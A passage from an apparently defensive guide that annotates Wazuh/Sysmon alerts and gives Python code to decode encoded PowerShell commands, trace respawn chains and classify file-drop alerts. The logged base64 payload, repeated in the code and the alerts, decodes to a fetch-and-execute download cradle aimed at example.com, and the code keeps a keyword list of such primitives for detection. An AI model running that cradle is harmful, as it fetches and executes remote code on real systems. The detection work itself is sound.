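# Base64 payload copied verbatim from the commandLine field of the alerts above.
ENCODED = (
    "SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4A"
    "RABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwA"
    "ZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA"
)
PWSH = r"C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe"
IMAGE = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
CMDLINE = f'"{PWSH}" "{PWSH}" -NoLogo -NoProfile -EncodedCommand {ENCODED}'

# The three Process Create alerts on this page, reduced to the fields the logic
# needs. Constructed sample input; values are the ones shown in the alerts.
EVENTS = [
    {"utcTime": "2025-04-24 22:55:52.709", "processGuid": "{94294ddc-c178-680a-e60c-000000000e00}",
     "processId": 12424, "image": IMAGE, "commandLine": CMDLINE,
     "parentProcessGuid": "{94294ddc-c172-680a-e30c-000000000e00}", "parentProcessId": 8356,
     "parentImage": IMAGE, "parentCommandLine": CMDLINE},
    {"utcTime": "2025-04-24 22:55:58.970", "processGuid": "{94294ddc-c17e-680a-e90c-000000000e00}",
     "processId": 17020, "image": IMAGE, "commandLine": CMDLINE,
     "parentProcessGuid": "{94294ddc-c178-680a-e60c-000000000e00}", "parentProcessId": 12424,
     "parentImage": IMAGE, "parentCommandLine": CMDLINE},
    {"utcTime": "2025-04-24 22:56:01.682", "processGuid": "{94294ddc-c181-680a-eb0c-000000000e00}",
     "processId": 384, "image": IMAGE, "commandLine": CMDLINE,
     "parentProcessGuid": "{94294ddc-c17e-680a-e90c-000000000e00}", "parentProcessId": 17020,
     "parentImage": IMAGE, "parentCommandLine": CMDLINE},
]

# -EncodedCommand may be abbreviated (-e, -ec, -enc, ...). Assumed regex, not
# PowerShell's parser; the lookbehind stops "Get-Date"-style text from matching.
ENC_FLAG = re.compile(r"(?i)(?<!\S)-e(?:c|n[a-z]*)?\s+([A-Za-z0-9+/=]{8,})")


def decode_encoded_command(cmdline):
    """Return the script behind -EncodedCommand, or None when there is none.
    PowerShell encodes the script as UTF-16LE and then base64."""
    m = ENC_FLAG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def looks_like_download_cradle(script):
    """Keyword test for 'fetch over HTTP, then Invoke-Expression' (assumed list)."""
    s = script.lower()
    runs_text = "iex" in s or "invoke-expression" in s
    fetches = any(k in s for k in ("downloadstring", "downloadfile",
                                   "invoke-webrequest", "net.webclient"))
    return runs_text and fetches


def chain_from(events, guid):
    """Follow parentProcessGuid links upward from `guid`. Returns the events from
    the youngest process to the oldest ancestor present in `events`."""
    by_guid = {e["processGuid"]: e for e in events}
    chain, seen = [], set()
    while guid in by_guid and guid not in seen:
        seen.add(guid)
        chain.append(by_guid[guid])
        guid = by_guid[guid]["parentProcessGuid"]
    return chain


def self_respawn_depth(events, guid):
    """Count consecutive hops, starting at `guid`, where the child has the same
    image and the same command line as its parent: a process re-launching itself."""
    depth = 0
    for ev in chain_from(events, guid):
        if (ev["image"].lower() == ev["parentImage"].lower()
                and ev["commandLine"] == ev["parentCommandLine"]):
            depth += 1
        else:
            break
    return depth


def triage(events, guid):
    """Summarise one Process Create alert for an analyst."""
    ev = next(e for e in events if e["processGuid"] == guid)
    decoded = decode_encoded_command(ev["commandLine"])
    return {
        "pid": ev["processId"],
        "decoded": decoded,
        "download_cradle": bool(decoded) and looks_like_download_cradle(decoded),
        "respawn_depth": self_respawn_depth(events, guid),
    }


if __name__ == "__main__":
    for ev in EVENTS:
        print(triage(EVENTS, ev["processGuid"]))
```

In a Wazuh integration script you would feed this the data.win.eventdata fields of each EID 1 alert. A respawn depth above 1 together with a cradle verdict is a far stronger signal than either rule on this page alone, and the decoded text is what belongs in the ticket, not the base64.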
rule.description: Executable file dropped in folder commonly used by malware Human‑readable summary of why the rule fired. Read this first—treat it as the alert's headline, then check it against the evidence: the "executable" here is a .ps1 that PowerShell writes to %TEMP% on every start (see targetFilename), so the headline overstates this event. The creating process, not the file, is what matters.
rule.id: 92213 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1105'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Command and Control'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['Ingress Tool Transfer'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 124 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: True True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid11_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745535356.2748955 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon ETW provider that wrote the event. Sysmon here, so eventID and the eventdata fields follow Sysmon's schema, not the Security log's.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} GUID of that provider; a stable filter key when names are localized or missing.
data.win.system.eventID: 11 Event ID in the provider's own numbering: Sysmon 11 = FileCreate (1 = ProcessCreate). Not a Security-log ID like 4624 or 4688.
data.win.system.version: 2 Schema version of the event; the eventdata field set can change between versions.
data.win.system.level: 4 Numeric level (4 = Informational); severityValue is its text form.
data.win.system.task: 11 Task category; Sysmon sets it equal to the event ID.
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:55:55.0268034Z Time the record was written to the log (UTC). Normally a little after eventdata.utcTime, when Sysmon observed the activity; use utcTime for timelines.
data.win.system.eventRecordID: 350477 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 PID of the process that wrote the record (the Sysmon service), not of the process being reported; that one is eventdata.processId.
data.win.system.threadID: 4740 Thread of the logging process; same caveat as processID.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational Event log channel the record came from; the agent must subscribe to it in its localfile configuration for these alerts to exist.
data.win.system.computer: Attacker Hostname Windows stamped on the record; should match agent.name.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "File created:
RuleName: -
UtcTime: 2025-04-24 22:55:54.983
ProcessGuid: {94294ddc-c178-680a-e60c-000000000e00}
ProcessId: 12424
Image: C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe
TargetFilename: C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_mciyuvr4.sxa.ps1
CreationUtcTime: 2025-04-24 22:55:54.983
User: Attacker\Attcker1" Rendered Sysmon message text as Windows formats it. The same values are parsed out into the data.win.eventdata.* fields below.
data.win.eventdata.utcTime: 2025-04-24 22:55:54.983 When Sysmon observed the file creation (UTC).
data.win.eventdata.processGuid: {94294ddc-c178-680a-e60c-000000000e00} Sysmon GUID of the creating process. It equals the processGuid of the Process Create alert above, so this file was written by that encoded-command PowerShell.
data.win.eventdata.processId: 12424 PID of the creating process; reused after exit, so join on processGuid.
data.win.eventdata.image: C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe Process that created the file.
data.win.eventdata.targetFilename: C:\\Users\\Attcker1\\AppData\\Local\\Temp\\__PSScriptPolicyTest_mciyuvr4.sxa.ps1 File that was written. __PSScriptPolicyTest_<random>.ps1 in %TEMP% is PowerShell's own start-up probe for AppLocker/WDAC script enforcement, created by every powershell.exe launch, and a known false positive for "dropped executable" rules. The suspicious part is the creating process, not this file.
data.win.eventdata.creationUtcTime: 2025-04-24 22:55:54.983 Creation timestamp of the file. Equal to utcTime here (a new file); if it is earlier, an existing file was overwritten.
data.win.eventdata.user: Attacker\\Attcker1 Account that created the file.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
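Rule 92213 fired on __PSScriptPolicyTest_mciyuvr4.sxa.ps1, a file PowerShell itself writes to %TEMP% on start, so the file is an expected artifact of the process above rather than a tool transfer. As an added example (not from the page and not Wazuh's rule logic), the code below classifies a Sysmon EID 11 alert: it recognises the policy-probe pattern, checks whether creationUtcTime predates the event (an existing file being overwritten), and otherwise applies an assumed list of executable extensions and drop directories. The first event is constructed from the alert above with the JSON-escaped paths exactly as the dashboard shows them; the second is an invented drop of update.exe for contrast. The probe regex and both lists are assumptions, since the rule's own lists are not on the page.

```python
import re
from datetime import datetime
from pathlib import PureWindowsPath

# PowerShell writes __PSScriptPolicyTest_<random>.<random>.ps1 (and .psm1) to %TEMP%
# at start-up to test AppLocker/WDAC script enforcement. Assumed pattern, fitted
# to the file names on this page.
POLICY_PROBE = re.compile(r"(?i)^__PSScriptPolicyTest_[a-z0-9]+\.[a-z0-9]+\.psm?1$")
# Assumed lists; the rule's own extension and directory lists are not shown here.
EXEC_EXT = {".exe", ".dll", ".scr", ".ps1", ".psm1", ".bat", ".cmd", ".vbs", ".js", ".hta"}
DROP_DIRS = ("\\appdata\\local\\temp\\", "\\appdata\\roaming\\",
             "\\programdata\\", "\\users\\public\\")
SYSMON_TS = "%Y-%m-%d %H:%M:%S.%f"


def unescape(path):
    """Wazuh's JSON shows Windows paths with doubled backslashes; collapse them."""
    return path.replace("\\\\", "\\")


def is_ps_policy_test(ev):
    """True when powershell.exe or pwsh.exe created its own policy-probe script in %TEMP%."""
    target = PureWindowsPath(unescape(ev["targetFilename"]))
    creator = PureWindowsPath(unescape(ev["image"])).name.lower()
    in_temp = str(target.parent).lower().endswith("\\appdata\\local\\temp")
    return (creator in ("powershell.exe", "pwsh.exe") and in_temp
            and bool(POLICY_PROBE.match(target.name)))


def overwrote_existing(ev, slack_seconds=2.0):
    """creationUtcTime is the file's creation stamp; if it is clearly older than the
    event itself, an existing file was overwritten rather than a new one dropped."""
    created = datetime.strptime(ev["creationUtcTime"], SYSMON_TS)
    seen = datetime.strptime(ev["utcTime"], SYSMON_TS)
    return (seen - created).total_seconds() > slack_seconds


def classify_file_create(ev):
    """Verdict for one EID 11 alert: probe artifact, suspicious drop, or neither."""
    if is_ps_policy_test(ev):
        return "powershell-policy-probe"  # expected start-up artifact; pivot to the process
    target = PureWindowsPath(unescape(ev["targetFilename"]))
    in_drop_dir = any(d in str(target).lower() for d in DROP_DIRS)
    if target.suffix.lower() in EXEC_EXT and in_drop_dir:
        return "suspicious-drop"
    return "unclassified"


# Event 1: the EID 11 alert above, paths escaped the way the dashboard shows them.
PAGE_EVENT = {
    "utcTime": "2025-04-24 22:55:54.983",
    "processGuid": "{94294ddc-c178-680a-e60c-000000000e00}",
    "image": r"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
    "targetFilename": r"C:\\Users\\Attcker1\\AppData\\Local\\Temp\\__PSScriptPolicyTest_mciyuvr4.sxa.ps1",
    "creationUtcTime": "2025-04-24 22:55:54.983",
}
# Event 2: constructed for contrast (not on the page): the same process
# overwriting an EXE in %TEMP% that was created minutes earlier.
CONSTRUCTED_DROP = {
    "utcTime": "2025-04-24 22:57:10.000",
    "processGuid": "{94294ddc-c178-680a-e60c-000000000e00}",
    "image": r"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
    "targetFilename": r"C:\\Users\\Attcker1\\AppData\\Local\\Temp\\update.exe",
    "creationUtcTime": "2025-04-24 22:50:00.000",
}

if __name__ == "__main__":
    for ev in (PAGE_EVENT, CONSTRUCTED_DROP):
        print(classify_file_create(ev),
              "overwrite" if overwrote_existing(ev) else "new-file")
```

Joining on processGuid is what turns the probe verdict into something useful: the file event is noise by itself, but it confirms that the PowerShell from the EID 1 alert above actually started, and any later EID 11 from the same GUID that is not a probe is worth a look.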
rule.description: Powershell.exe spawned a powershell process which executed a base64 encoded command Human‑readable summary of why the rule fired. Read this first—treat it as the alert's headline. Decode the base64 (UTF-16LE) before triage; here it is a download cradle, and the parent's command line is identical to the child's.
rule.id: 92057 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1059.001'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Execution'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['PowerShell'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 121 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: True True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid1_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745535362.2751724 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon ETW provider that wrote the event. Sysmon here, so eventID and the eventdata fields follow Sysmon's schema, not the Security log's.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} GUID of that provider; a stable filter key when names are localized or missing.
data.win.system.eventID: 1 Event ID in the provider's own numbering: Sysmon 1 = ProcessCreate (11 = FileCreate). Not a Security-log ID like 4624 or 4688.
data.win.system.version: 5 Schema version of the event; the eventdata field set can change between versions.
data.win.system.level: 4 Numeric level (4 = Informational); severityValue is its text form.
data.win.system.task: 1 Task category; Sysmon sets it equal to the event ID.
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:56:00.0931226Z Time the record was written to the log (UTC). Normally a little after eventdata.utcTime, when Sysmon observed the activity; use utcTime for timelines.
data.win.system.eventRecordID: 350561 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 PID of the process that wrote the record (the Sysmon service), not of the process being reported; that one is eventdata.processId.
data.win.system.threadID: 4740 Thread of the logging process; same caveat as processID.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational Event log channel the record came from; the agent must subscribe to it in its localfile configuration for these alerts to exist.
data.win.system.computer: Attacker Hostname Windows stamped on the record; should match agent.name.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "Process Create:
RuleName: -
UtcTime: 2025-04-24 22:55:58.970
ProcessGuid: {94294ddc-c17e-680a-e90c-000000000e00}
ProcessId: 17020
Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
FileVersion: 10.0.26100.3323 (WinBuild.160101.0800)
Description: Windows PowerShell
Product: Microsoft® Windows® Operating System
Company: Microsoft Corporation
OriginalFileName: PowerShell.EXE
CommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
CurrentDirectory: C:\Users\Attcker1\
User: Attacker\Attcker1
LogonGuid: {94294ddc-ea85-67fe-8465-020000000000}
LogonId: 0x26584
TerminalSessionId: 1
IntegrityLevel: Medium
Hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC
ParentProcessGuid: {94294ddc-c178-680a-e60c-000000000e00}
ParentProcessId: 12424
ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
ParentCommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
ParentUser: Attacker\Attcker1" Rendered Sysmon message text as Windows formats it. The same values are parsed out into the data.win.eventdata.* fields below.
data.win.eventdata.utcTime: 2025-04-24 22:55:58.970 When Sysmon observed the process start (UTC). Use this, not systemTime, for the timeline.
data.win.eventdata.processGuid: {94294ddc-c17e-680a-e90c-000000000e00} Sysmon's unique ID for the process; it survives PID reuse and reboots. Join key: later events from this process carry it as processGuid, its children carry it as parentProcessGuid.
data.win.eventdata.processId: 17020 Windows PID. PIDs are reused after exit, so pivot on processGuid instead.
data.win.eventdata.image: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe Full path of the executed binary.
data.win.eventdata.fileVersion: 10.0.26100.3323 (WinBuild.160101.0800) Version string from the binary's PE version resource.
data.win.eventdata.description: Windows PowerShell Description from the PE version resource.
data.win.eventdata.product: Microsoft® Windows® Operating System Product name from the PE version resource.
data.win.eventdata.company: Microsoft Corporation Company from the PE version resource; an unexpected vendor, or one that does not fit the path, is a lead.
data.win.eventdata.originalFileName: PowerShell.EXE Internal name from the PE version resource; compare it with the file name in image to spot renamed binaries.
data.win.eventdata.commandLine: \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA Full command line; the doubled backslashes are JSON escaping. The -EncodedCommand argument is base64 over UTF-16LE and decodes to IEX(New-Object Net.WebClient).DownloadString('https://example.com/test'), the same download-and-execute cradle as in the previous Process Create alert.
data.win.eventdata.currentDirectory: C:\\Users\\Attcker1\\ Working directory of the new process.
data.win.eventdata.user: Attacker\\Attcker1 Account the process runs as (DOMAIN\user). The domain part equals the hostname, so this is a local account.
data.win.eventdata.logonGuid: {94294ddc-ea85-67fe-8465-020000000000} Logon session the process belongs to; correlate with Security event 4624.
data.win.eventdata.logonId: 0x26584 The same logon session as a hex logon ID (LUID).
data.win.eventdata.terminalSessionId: 1 Windows session number; 1 = interactive desktop session, 0 = services.
data.win.eventdata.integrityLevel: Medium Medium = not elevated; High = running as administrator.
data.win.eventdata.hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC Hash(es) of the image, as configured in Sysmon. Pivot for reputation lookups and for spotting a swapped binary.
data.win.eventdata.parentProcessGuid: {94294ddc-c178-680a-e60c-000000000e00} Sysmon GUID of the parent. It equals the processGuid of the previous Process Create alert (PID 12424), so this is the next hop of the same chain.
data.win.eventdata.parentProcessId: 12424 Parent's PID at the time of the spawn.
data.win.eventdata.parentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe Parent's binary; the same as image here, i.e. PowerShell spawning PowerShell.
data.win.eventdata.parentCommandLine: \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA Parent's command line; identical to commandLine, so the process is re-launching itself with the same encoded payload.
data.win.eventdata.parentUser: Attacker\\Attcker1 Account the parent runs as.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Executable file dropped in folder commonly used by malware Human‑readable summary of why the rule fired. Read this first—treat it as the alert's headline, then check it against the evidence: the "executable" here is again PowerShell's own __PSScriptPolicyTest_*.ps1 in %TEMP% (see targetFilename), so the headline overstates this event. The creating process, not the file, is what matters.
rule.id: 92213 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1105'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Command and Control'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['Ingress Tool Transfer'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 125 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: True True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid11_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745535362.2759795 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon ETW provider that wrote the event. Sysmon here, so eventID and the eventdata fields follow Sysmon's schema, not the Security log's.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} GUID of that provider; a stable filter key when names are localized or missing.
data.win.system.eventID: 11 Event ID in the provider's own numbering: Sysmon 11 = FileCreate (1 = ProcessCreate). Not a Security-log ID like 4624 or 4688.
data.win.system.version: 2 Schema version of the event; the eventdata field set can change between versions.
data.win.system.level: 4 Numeric level (4 = Informational); severityValue is its text form.
data.win.system.task: 11 Task category; Sysmon sets it equal to the event ID.
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:56:00.3687114Z Time the record was written to the log (UTC). Normally a little after eventdata.utcTime, when Sysmon observed the activity; use utcTime for timelines.
data.win.system.eventRecordID: 350564 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 PID of the process that wrote the record (the Sysmon service), not of the process being reported; that one is eventdata.processId.
data.win.system.threadID: 4740 Thread of the logging process; same caveat as processID.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational Event log channel the record came from; the agent must subscribe to it in its localfile configuration for these alerts to exist.
data.win.system.computer: Attacker Hostname Windows stamped on the record; should match agent.name.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "File created:
RuleName: -
UtcTime: 2025-04-24 22:56:00.355
ProcessGuid: {94294ddc-c17e-680a-e90c-000000000e00}
ProcessId: 17020
Image: C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe
TargetFilename: C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_vzf12wvk.xny.ps1
CreationUtcTime: 2025-04-24 22:56:00.355
User: Attacker\Attcker1" Rendered Sysmon message text as Windows formats it. The same values are parsed out into the data.win.eventdata.* fields below.
data.win.eventdata.utcTime: 2025-04-24 22:56:00.355 When Sysmon observed the file creation (UTC).
data.win.eventdata.processGuid: {94294ddc-c17e-680a-e90c-000000000e00} Sysmon GUID of the creating process. It equals the processGuid of the Process Create alert above (PID 17020), so this file was written by that encoded-command PowerShell.
data.win.eventdata.processId: 17020 PID of the creating process; reused after exit, so join on processGuid.
data.win.eventdata.image: C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe Process that created the file.
data.win.eventdata.targetFilename: C:\\Users\\Attcker1\\AppData\\Local\\Temp\\__PSScriptPolicyTest_vzf12wvk.xny.ps1 File that was written. Another __PSScriptPolicyTest_<random>.ps1 in %TEMP%: PowerShell's own start-up probe for AppLocker/WDAC script enforcement, written on every launch, so one per hop of the chain. A known false positive for "dropped executable" rules; the creating process is the signal.
data.win.eventdata.creationUtcTime: 2025-04-24 22:56:00.355 Creation timestamp of the file. Equal to utcTime here (a new file); if it is earlier, an existing file was overwritten.
data.win.eventdata.user: Attacker\\Attcker1 Account that created the file.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Powershell.exe spawned a powershell process which executed a base64 encoded command Human‑readable summary of why the rule fired. Read this first—treat it as the alert's headline. Decode the base64 (UTF-16LE) before triage; here it is the same download cradle as before, now one hop deeper in the chain.
rule.id: 92057 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1059.001'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Execution'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['PowerShell'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 122 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: True True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid1_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745535365.2762564 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon ETW provider that wrote the event. Sysmon here, so eventID and the eventdata fields follow Sysmon's schema, not the Security log's.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} GUID of that provider; a stable filter key when names are localized or missing.
data.win.system.eventID: 1 Event ID in the provider's own numbering: Sysmon 1 = ProcessCreate (11 = FileCreate). Not a Security-log ID like 4624 or 4688.
data.win.system.version: 5 Schema version of the event; the eventdata field set can change between versions.
data.win.system.level: 4 Numeric level (4 = Informational); severityValue is its text form.
data.win.system.task: 1 Task category; Sysmon sets it equal to the event ID.
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:56:03.3106068Z Time the record was written to the log (UTC). Normally a little after eventdata.utcTime, when Sysmon observed the activity; use utcTime for timelines.
data.win.system.eventRecordID: 350595 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 PID of the process that wrote the record (the Sysmon service), not of the process being reported; that one is eventdata.processId.
data.win.system.threadID: 4740 Thread of the logging process; same caveat as processID.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational Event log channel the record came from; the agent must subscribe to it in its localfile configuration for these alerts to exist.
data.win.system.computer: Attacker Hostname Windows stamped on the record; should match agent.name.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "Process Create:
RuleName: -
UtcTime: 2025-04-24 22:56:01.682
ProcessGuid: {94294ddc-c181-680a-eb0c-000000000e00}
ProcessId: 384
Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
FileVersion: 10.0.26100.3323 (WinBuild.160101.0800)
Description: Windows PowerShell
Product: Microsoft® Windows® Operating System
Company: Microsoft Corporation
OriginalFileName: PowerShell.EXE
CommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
CurrentDirectory: C:\Users\Attcker1\
User: Attacker\Attcker1
